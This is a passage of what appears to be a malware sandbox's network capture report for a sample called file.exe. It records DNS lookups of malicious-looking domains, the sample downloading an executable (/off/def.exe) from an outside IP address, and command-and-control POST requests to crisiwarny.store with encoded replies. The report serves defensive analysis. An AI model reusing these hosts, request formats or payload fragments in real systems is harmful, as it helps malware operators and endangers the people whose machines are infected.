Oct 28, 2024 02:07:27.068850994 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:27.068861961 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068872929 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068882942 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068892956 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068901062 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:27.068907976 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068912029 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:27.068924904 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068941116 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068949938 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:27.068953037 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068964005 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068974972 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.068986893 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:27.069011927 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:27.069093943 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.069104910 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.069116116 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.069125891 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.069133043 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:27.069138050 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:27.069154024 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:27.069180012 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:28.187381029 CET	49724	80	192.168.2.5	185.215.113.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 02:07:04.478595972 CET	62988	53	192.168.2.5	1.1.1.1
Oct 28, 2024 02:07:04.488415956 CET	53	62988	1.1.1.1	192.168.2.5
Oct 28, 2024 02:07:04.509949923 CET	63931	53	192.168.2.5	1.1.1.1
Oct 28, 2024 02:07:04.522269011 CET	53	63931	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 28, 2024 02:07:04.478595972 CET	192.168.2.5	1.1.1.1	0xf072	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Oct 28, 2024 02:07:04.509949923 CET	192.168.2.5	1.1.1.1	0xae9d	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 28, 2024 02:07:04.488415956 CET	1.1.1.1	192.168.2.5	0xf072	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Oct 28, 2024 02:07:04.522269011 CET	1.1.1.1	192.168.2.5	0xae9d	No error (0)	crisiwarny.store		172.67.170.64	A (IP address)	IN (0x0001)	false
Oct 28, 2024 02:07:04.522269011 CET	1.1.1.1	192.168.2.5	0xae9d	No error (0)	crisiwarny.store		104.21.95.91	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

crisiwarny.store

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49724	185.215.113.16	80	6180	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 02:07:21.703912020 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Oct 28, 2024 02:07:22.604780912 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Oct 2024 01:07:22 GMT Content-Type: application/octet-stream Content-Length: 2783232 Last-Modified: Sun, 27 Oct 2024 23:53:51 GMT Connection: keep-alive ETag: "671ed28f-2a7800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 43 c7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ +C`Ui` @ @.rsrc`2@.idata 8@vapebhpc :@vabnfpbo R@.taggant@"V*@
Oct 28, 2024 02:07:22.604809999 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2024 02:07:22.604816914 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2024 02:07:22.604871988 CET	336	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2024 02:07:22.604877949 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2024 02:07:22.604891062 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2024 02:07:22.604897022 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2024 02:07:22.604967117 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2024 02:07:22.604979038 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2024 02:07:22.604984999 CET	1236	IN	Data Raw: 03 9f 2f 2f 07 54 73 aa 1a 4c ea 01 b1 0a 14 21 5c a3 fc 11 40 83 dd ec 76 fa 38 1b 4d 13 04 5e 43 05 2c aa 51 93 e3 31 9c 27 d8 a3 8b 5d d9 85 a9 0d 30 0a f9 d9 50 44 92 87 d6 9f f8 16 de 19 15 45 de 8e cb 8b b3 6c de 25 fa 51 23 4b fc cb 1d 0c Data Ascii: //TsL!\@v8M^C,Q1']0PDEl%Q#K^RDMV}[)a3 ]l}>[Nx>]`hRo7OTyHJ)-TkK#0/G1# j,P !s\|K5`e**r'o
Oct 28, 2024 02:07:22.610241890 CET	1236	IN	Data Raw: 60 ed 2e c3 91 52 46 e7 59 16 e7 d4 8d 5d 0a 0b 47 5d 41 5f 8f dc 1a fc 1d fe 4d 0c c3 3a fc 25 d5 ef d0 1c 18 51 c5 bb 62 7a 1b de b7 6f 5b 29 f7 04 11 8d 10 62 d2 c8 7c fc e8 c6 0b f1 e9 9c 5f c7 e6 ec 38 3a 43 84 5e ad e8 d8 71 88 0c 06 fa 9a Data Ascii: `.RFY]G]A_M:%Qbzo[)b\|_8:C^qp>AFIV4Jx\=DSKnO<:0s>\5qZrZ9i+t#MgBlQq:"\7,rGM(_z=nVa"`(U/EoOd/8pFIq?&$j^Dp3/65M<K=8//%B?q\'

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.67.170.64	443	6180	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 01:07:05 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: crisiwarny.store
2024-10-28 01:07:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-28 01:07:05 UTC	1009	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 01:07:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qk5tbar3sjun35av0l56d3ur8k; expires=Thu, 20 Feb 2025 18:53:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WqDbSK2aTwxw1O1oPRbetYunt%2BOH%2FHj4Ib50YEkzg5ctxM4hTpE6U0OQSBdRl0WaXAC0Fp1bR%2FPcLFDgbgcVuHEAOqW0QSw1Z0Dd4%2BOfYKqQGAuo2UwblcOo4CIxiTDQfFky"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9706e63a642e76-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1647&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1756215&cwnd=250&unsent_bytes=0&cid=c43b15d1eba0251f&ts=613&x=0"
2024-10-28 01:07:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-28 01:07:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	172.67.170.64	443	6180	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 01:07:06 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: crisiwarny.store
2024-10-28 01:07:06 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-28 01:07:09 UTC	1006	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 01:07:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u17lop1ocumspf3kc1lubva3iu; expires=Thu, 20 Feb 2025 18:53:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1IpjRvM6k%2F22giQHqWk93DEoLRmYXpiri64Gw9KSZIUdlbnc2gkPvknUF5IjBU2lhV%2BJuXQqbbpQUiJ9t1wF0U0dYJ0GobhzDZoOO1H5WGBpw37RWzsOZZ5Gr3iINqHExxOV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9706ee38aa477b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1324&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=2209000&cwnd=245&unsent_bytes=0&cid=537fe1ff7b70054e&ts=2626&x=0"
2024-10-28 01:07:09 UTC	363	IN	Data Raw: 34 34 36 63 0d 0a 63 31 44 58 78 45 41 72 6e 4f 41 31 46 45 43 71 38 44 6c 43 6a 58 4e 43 36 56 2f 43 54 36 64 6d 34 55 76 59 79 4d 46 38 4c 5a 30 49 63 71 48 6d 65 68 2b 77 77 6b 5a 78 59 70 43 45 53 7a 66 6f 58 32 43 49 4f 2b 42 31 77 51 65 4e 4f 4c 33 6b 34 77 70 41 76 30 6b 32 74 71 67 7a 54 72 44 43 55 47 78 69 6b 4b 74 43 59 4f 67 64 59 4e 4e 39 70 79 58 46 42 34 30 70 75 61 4f 75 44 45 48 2b 47 7a 79 77 72 43 56 49 2b 49 46 5a 65 53 58 50 6c 56 67 6f 34 78 6f 76 67 54 4c 67 59 34 55 44 6d 32 6e 69 36 6f 77 5a 57 66 77 2b 4d 61 53 76 59 6c 61 77 6d 78 64 78 4c 6f 6a 4b 47 79 50 6f 45 53 36 50 4f 36 6b 6e 7a 77 36 46 4b 4c 79 69 73 52 56 4c 39 52 73 79 73 36 30 76 51 65 79 4d 55 33 34 75 79 5a 39 59 59 4b 46 52 4a 35 4e 39 2b 47 32 57 4e 6f 41 34 71 Data Ascii: 446cc1DXxEArnOA1FECq8DlCjXNC6V/CT6dm4UvYyMF8LZ0IcqHmeh+wwkZxYpCESzfoX2CIO+B1wQeNOL3k4wpAv0k2tqgzTrDCUGxikKtCYOgdYNN9pyXFB40puaOuDEH+GzywrCVI+IFZeSXPlVgo4xovgTLgY4UDm2ni6owZWfw+MaSvYlawmxdxLojKGyPoES6PO6knzw6FKLyisRVL9Rsys60vQeyMU34uyZ9YYKFRJ5N9+G2WNoA4q
2024-10-28 01:07:09 UTC	1369	IN	Data Raw: 59 42 51 4b 65 49 63 49 49 59 33 72 79 37 46 41 34 6b 6a 74 61 43 6e 45 30 4c 35 45 54 4c 31 36 47 4a 4f 35 73 49 50 4e 67 48 4e 67 6c 77 73 2b 56 4d 61 79 79 4c 75 4e 49 55 44 6a 32 6e 69 36 71 73 62 54 50 77 61 50 62 61 75 4b 56 76 2b 6b 46 46 37 4a 39 71 55 58 69 37 6c 45 6a 4b 42 4d 36 59 75 7a 41 2b 4b 4c 4c 32 75 34 31 41 50 2b 41 6c 79 37 65 59 44 52 50 57 4f 58 57 45 69 69 49 30 56 4f 61 38 57 4c 4d 74 6c 34 43 6e 45 41 49 49 74 74 4b 53 6e 45 6b 6e 78 48 44 32 7a 72 43 4a 4f 39 49 70 66 64 79 2f 44 6e 56 73 6c 34 68 55 6d 68 7a 79 6c 62 59 74 45 68 44 48 36 38 75 4d 77 53 50 77 44 63 49 43 6c 4c 45 66 35 6c 42 64 70 62 4e 48 53 58 43 79 76 53 57 43 46 4f 4b 38 2f 78 42 61 47 4a 36 69 6d 70 68 68 43 2f 42 38 79 73 4b 45 76 52 2f 69 46 56 48 34 6d Data Ascii: YBQKeIcIIY3ry7FA4kjtaCnE0L5ETL16GJO5sIPNgHNglws+VMayyLuNIUDj2ni6qsbTPwaPbauKVv+kFF7J9qUXi7lEjKBM6YuzA+KLL2u41AP+Aly7eYDRPWOXWEiiI0VOa8WLMtl4CnEAIIttKSnEknxHD2zrCJO9Ipfdy/DnVsl4hUmhzylbYtEhDH68uMwSPwDcIClLEf5lBdpbNHSXCyvSWCFOK8/xBaGJ6imphhC/B8ysKEvR/iFVH4m
2024-10-28 01:07:09 UTC	1369	IN	Data Raw: 79 76 53 57 43 48 4e 4b 41 6d 7a 77 43 44 4c 72 65 76 6f 42 6c 4d 38 68 59 34 75 36 45 6d 52 66 65 50 55 58 59 6c 7a 4a 64 4a 4a 65 59 64 4c 4d 74 7a 34 43 72 64 52 4e 74 70 6c 61 32 31 48 57 44 38 41 44 76 31 75 57 78 51 76 6f 56 62 4e 6e 71 49 6c 56 34 6f 35 42 63 6f 69 79 2b 6c 49 38 34 46 69 53 2b 37 70 36 38 59 54 2f 34 52 4e 4c 6d 6d 4a 55 37 73 6b 46 4a 77 4d 4d 4c 53 46 57 44 6f 43 57 44 54 66 5a 59 39 30 68 57 56 61 34 2b 70 72 52 42 49 36 56 45 74 2b 37 39 69 54 76 4c 43 44 7a 59 70 79 4a 35 63 4b 4f 6b 56 4b 49 51 79 71 54 2f 45 43 49 30 37 76 61 71 71 45 45 44 7a 47 44 2b 79 71 79 6c 44 38 34 5a 51 64 32 4b 47 30 6c 77 34 72 30 6c 67 76 53 32 74 49 65 73 50 6a 79 44 36 74 65 30 48 44 2f 67 64 63 75 33 6d 4a 6b 58 32 69 46 68 2f 4b 4d 4b 64 55 Data Ascii: yvSWCHNKAmzwCDLrevoBlM8hY4u6EmRfePUXYlzJdJJeYdLMtz4CrdRNtpla21HWD8ADv1uWxQvoVbNnqIlV4o5Bcoiy+lI84FiS+7p68YT/4RNLmmJU7skFJwMMLSFWDoCWDTfZY90hWVa4+prRBI6VEt+79iTvLCDzYpyJ5cKOkVKIQyqT/ECI07vaqqEEDzGD+yqylD84ZQd2KG0lw4r0lgvS2tIesPjyD6te0HD/gdcu3mJkX2iFh/KMKdU
2024-10-28 01:07:09 UTC	1369	IN	Data Raw: 67 78 58 32 6e 4e 59 56 63 77 77 61 64 6e 2b 45 2f 64 62 38 4f 66 4b 7a 6d 4a 55 57 2b 32 68 64 36 49 63 53 61 56 43 62 6d 48 53 71 43 4e 71 77 6d 77 51 69 4b 4c 4c 79 72 70 68 74 4f 2b 78 30 34 73 36 55 68 52 76 47 4e 58 7a 5a 73 69 4a 56 44 59 4c 64 52 42 5a 77 32 72 69 75 46 47 38 30 77 2b 71 32 76 58 68 65 2f 48 54 75 7a 6f 43 64 46 2f 34 52 66 63 79 72 4d 6b 31 30 6d 37 42 34 6b 6a 6a 79 76 4b 63 6b 4b 69 53 69 37 70 71 67 52 52 50 70 52 66 50 57 68 4f 67 6d 6d 77 6d 5a 31 4e 4e 2b 43 56 32 44 77 58 7a 6e 4c 4f 71 78 74 6e 55 53 43 4f 37 43 67 72 52 74 41 2b 68 49 39 73 71 73 6b 52 66 53 4c 58 33 41 74 77 59 42 59 4c 4f 45 57 4c 6f 63 7a 72 53 66 47 43 63 4e 6e 2b 71 32 37 58 68 65 2f 50 54 57 34 69 43 6c 46 2b 63 4a 49 4f 44 75 49 6c 56 64 67 74 31 Data Ascii: gxX2nNYVcwwadn+E/db8OfKzmJUW+2hd6IcSaVCbmHSqCNqwmwQiKLLyrphtO+x04s6UhRvGNXzZsiJVDYLdRBZw2riuFG80w+q2vXhe/HTuzoCdF/4RfcyrMk10m7B4kjjyvKckKiSi7pqgRRPpRfPWhOgmmwmZ1NN+CV2DwXznLOqxtnUSCO7CgrRtA+hI9sqskRfSLX3AtwYBYLOEWLoczrSfGCcNn+q27Xhe/PTW4iClF+cJIODuIlVdgt1
2024-10-28 01:07:09 UTC	1369	IN	Data Raw: 70 7a 33 56 42 38 45 59 72 4b 6d 31 46 55 4c 7a 55 53 33 37 76 32 4a 4f 38 73 49 50 4e 69 54 48 6d 31 67 76 37 68 67 73 68 6a 69 70 4b 4d 51 43 68 79 4f 77 71 71 55 59 54 76 6f 62 4d 62 53 73 4b 30 37 32 68 56 52 6b 59 6f 62 53 58 44 69 76 53 57 43 69 4f 72 49 6a 31 55 53 63 5a 36 50 71 70 42 49 50 70 31 45 32 76 36 6b 6d 54 76 4b 45 55 6e 41 76 79 5a 31 61 49 4f 41 56 4b 34 49 37 6f 53 44 41 43 59 63 37 73 4b 47 73 45 6b 62 7a 48 48 4c 37 35 69 56 52 76 74 6f 58 52 79 2f 47 6e 46 77 32 72 77 35 75 6b 6e 32 6e 49 59 56 63 77 79 69 32 70 61 41 52 54 50 77 51 4f 4b 65 30 4c 6b 44 32 68 31 74 39 4c 4d 36 41 58 53 2f 6d 45 69 4f 43 4f 71 67 68 7a 77 65 45 61 66 54 71 70 41 59 50 70 31 45 52 6f 72 59 76 43 65 48 4d 54 6a 59 6c 78 4e 49 44 59 4f 63 63 4b 49 45 Data Ascii: pz3VB8EYrKm1FULzUS37v2JO8sIPNiTHm1gv7hgshjipKMQChyOwqqUYTvobMbSsK072hVRkYobSXDivSWCiOrIj1UScZ6PqpBIPp1E2v6kmTvKEUnAvyZ1aIOAVK4I7oSDACYc7sKGsEkbzHHL75iVRvtoXRy/GnFw2rw5ukn2nIYVcwyi2paARTPwQOKe0LkD2h1t9LM6AXS/mEiOCOqghzweEafTqpAYPp1ERorYvCeHMTjYlxNIDYOccKIE
2024-10-28 01:07:09 UTC	1369	IN	Data Raw: 41 43 4c 4b 72 71 75 70 78 6c 4b 2f 42 30 35 73 71 55 74 54 66 65 4d 58 6e 6c 69 68 74 4a 63 4f 4b 39 4a 59 4b 6f 6d 6f 79 48 49 52 4a 78 6e 6f 2b 71 6b 45 67 2b 6e 55 54 36 37 6f 79 4a 44 2b 49 5a 53 63 43 6a 4e 6b 6c 41 6a 34 42 55 6d 6a 7a 4b 67 4a 73 77 46 68 53 79 77 6f 61 55 54 54 50 6b 58 63 76 76 6d 4a 56 47 2b 32 68 64 57 4f 63 57 65 58 47 44 77 58 7a 6e 4c 4f 71 78 74 6e 55 53 49 4a 62 36 74 6f 78 4e 4d 39 78 51 32 76 36 4d 69 51 65 79 4b 56 33 45 77 32 70 4a 53 4a 65 4d 53 49 49 38 37 71 53 76 47 41 4d 4e 6e 2b 71 32 37 58 68 65 2f 50 44 36 79 6a 79 56 53 76 70 30 5a 62 32 4c 50 6e 68 74 34 72 78 41 72 67 54 4b 74 4c 73 4d 48 69 43 79 77 71 36 51 57 51 75 30 53 50 62 71 69 49 6b 62 34 68 46 5a 35 4a 4d 2b 62 57 69 6a 6f 55 57 37 4c 4f 72 68 74 Data Ascii: ACLKrqupxlK/B05sqUtTfeMXnlihtJcOK9JYKomoyHIRJxno+qkEg+nUT67oyJD+IZScCjNklAj4BUmjzKgJswFhSywoaUTTPkXcvvmJVG+2hdWOcWeXGDwXznLOqxtnUSIJb6toxNM9xQ2v6MiQeyKV3Ew2pJSJeMSII87qSvGAMNn+q27Xhe/PD6yjyVSvp0Zb2LPnht4rxArgTKtLsMHiCywq6QWQu0SPbqiIkb4hFZ5JM+bWijoUW7LOrht
2024-10-28 01:07:09 UTC	1369	IN	Data Raw: 36 74 70 65 4e 51 44 2f 42 52 61 6f 7a 6d 4b 30 37 6c 6b 30 46 37 4d 73 2f 53 5a 47 36 76 43 57 44 54 66 5a 55 75 79 77 71 45 50 36 76 6e 68 41 68 46 2b 41 45 31 6f 71 6c 69 42 37 36 45 46 79 35 78 68 74 4a 66 4d 61 39 4a 63 4e 6c 6d 39 58 36 53 56 4e 45 32 39 4c 50 6a 43 41 2b 6e 51 33 7a 31 74 47 49 52 76 73 56 55 5a 44 44 4f 6b 55 30 6a 71 43 38 65 72 43 65 74 4b 39 49 56 76 52 65 39 73 4b 34 59 57 4f 35 64 4a 37 61 6f 4c 45 37 6f 77 68 6b 32 4c 59 6a 4b 59 6d 43 6e 55 52 2f 46 66 62 68 74 6e 55 53 32 4b 72 53 6b 70 41 68 65 73 6a 59 6f 75 4b 41 31 57 4c 37 4d 46 33 42 69 6b 4d 49 56 59 4f 73 41 59 4e 4e 74 38 6e 61 51 56 39 52 35 36 4c 58 74 42 77 2f 70 55 57 72 6e 36 47 4a 62 76 74 6f 58 4d 53 48 61 67 46 30 6a 2b 52 4a 6e 74 51 4f 4f 4b 73 4d 42 68 Data Ascii: 6tpeNQD/BRaozmK07lk0F7Ms/SZG6vCWDTfZUuywqEP6vnhAhF+AE1oqliB76EFy5xhtJfMa9JcNlm9X6SVNE29LPjCA+nQ3z1tGIRvsVUZDDOkU0jqC8erCetK9IVvRe9sK4YWO5dJ7aoLE7owhk2LYjKYmCnUR/FfbhtnUS2KrSkpAhesjYouKA1WL7MF3BikMIVYOsAYNNt8naQV9R56LXtBw/pUWrn6GJbvtoXMSHagF0j+RJntQOOKsMBh
2024-10-28 01:07:09 UTC	1369	IN	Data Raw: 31 44 77 4c 59 48 7a 57 30 73 44 4a 65 38 63 49 5a 4e 69 53 49 79 67 6c 75 72 78 55 78 79 32 58 77 66 35 35 52 30 48 37 71 2b 4c 78 51 56 72 38 48 63 75 33 30 62 41 6e 73 77 67 38 32 5a 63 75 41 53 53 62 73 42 79 50 4d 41 35 34 4b 79 77 4f 43 50 36 71 39 72 46 46 68 79 54 41 4d 69 37 4d 68 52 2f 43 46 51 57 64 69 68 74 4a 55 59 4c 63 6f 59 4d 4e 39 6e 32 4f 46 48 4d 4e 78 2b 70 2b 67 45 45 48 34 42 79 50 34 67 53 78 4f 2f 35 52 48 59 53 32 48 76 47 30 42 72 31 39 67 6a 58 33 34 66 34 74 45 68 7a 6a 36 38 76 4e 4d 46 4b 70 43 5a 65 58 30 50 51 66 6e 77 6b 45 32 65 70 72 63 47 7a 4b 76 53 57 44 4d 50 72 49 2f 77 77 65 56 4b 76 32 55 6e 54 6c 42 2b 42 41 6b 70 61 73 75 61 50 32 54 58 55 67 63 33 5a 46 56 4c 75 67 48 4d 63 74 7a 34 43 4b 46 58 4c 70 70 38 75 Data Ascii: 1DwLYHzW0sDJe8cIZNiSIyglurxUxy2Xwf55R0H7q+LxQVr8Hcu30bAnswg82ZcuASSbsByPMA54KywOCP6q9rFFhyTAMi7MhR/CFQWdihtJUYLcoYMN9n2OFHMNx+p+gEEH4ByP4gSxO/5RHYS2HvG0Br19gjX34f4tEhzj68vNMFKpCZeX0PQfnwkE2eprcGzKvSWDMPrI/wweVKv2UnTlB+BAkpasuaP2TXUgc3ZFVLugHMctz4CKFXLpp8u
